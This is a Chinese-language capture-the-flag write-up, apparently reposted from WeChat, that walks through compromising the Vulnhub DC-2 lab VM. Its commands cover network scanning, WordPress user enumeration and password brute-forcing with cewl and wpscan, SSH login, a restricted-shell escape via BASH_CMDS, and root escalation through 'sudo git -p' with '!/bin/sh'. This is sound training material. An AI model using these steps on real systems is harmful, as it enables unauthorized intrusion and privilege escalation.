​Vulnhub DC-2

admin 2022年8月28日23:36:47评论17 views字数 1134阅读3分46秒阅读模式

Vulnhub DC-2

下载地址:https://www.vulnhub.com/entry/dc-2,311/

NAT连接,确保kali和虚拟机在同一网段

kali:192.168.152.130

扫描存活主机

arp-scan -l
masscan -p 80,22 192.168.152.0/24
nmap -sP 192.168.152.0/24

​Vulnhub DC-2

得到目标机IP:192.168.152.246

扫描开放端口

nmap -sS -sV -v -p- -A 192.168.152.246

​Vulnhub DC-2

得到目标机开放端口:80、7744(SSH)

扫描目录

访问80端口看下网站信息

得到信息:

CMS---------->WorldPress4.7.10

脚本---------->PHP

操作系统--->Linux

数据库------->Mysql

有个小提示:访问会跳转dc-2,需要去hosts里绑定一下

vim /etc/hosts
192.168.152.246 dc-2

​Vulnhub DC-2

​Vulnhub DC-2

浏览网页获得第一个flag

​Vulnhub DC-2

根据提示是需要爆破,使用cwel工具生成密码字典

当能知道是什么CMS后,就可以针对性的搜索漏洞或者利用工具

使用wpscan扫描网站

先用cewl生成密码词典

cwel:Linux下的密码生成工具,爬取网页的,可以指定深度

学习文章:https://www.codercto.com/a/44828.html

cewl http://dc-2/ -w passwd.txt

​Vulnhub DC-2

使用wpscan扫描

wpscan --url http://dc-2 -e u

​Vulnhub DC-2

​Vulnhub DC-2

爆出admin、jerry、tom账户,再根据passwd.txt爆破密码

​Vulnhub DC-2

有了账号密码,可以去尝试登录后台和ssh

可以看到jerry权限不够,tom可以成功登录

ssh [email protected] -p 7744

​Vulnhub DC-2

登录ssh后拿到flag3

cat命令没有,可以用vi

其实还可以使用如下命令查看当前有哪些命令可以使用

compgen -c

​Vulnhub DC-2

这边说要su -jerry

尝试下不行

​Vulnhub DC-2

这里需要绕过受限制的shell

受限制的shell:顾名思义就是被限制了使用,它与一般标准shell的区别在于会限制执行一些行为。

绕过方法:

BASH_CMDS[a]=/bin/sh;a 
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin</pre>

​Vulnhub DC-2

登录jerry,拿到flag4

​Vulnhub DC-2

​Vulnhub DC-2

最后根据提示git提权

git -p 分页显示命令手册,会调用more命令,more命令是可以执行sh的

https://gtfobins.github.io/gtfobins/git/

sudo /usr/bin/git -p help config
!/bin/sh

​Vulnhub DC-2


原文始发于微信公众号(Nurburgring):​Vulnhub DC-2

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月28日23:36:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ​Vulnhub DC-2http://cn-sec.com/archives/872744.html

发表评论

匿名网友 填写信息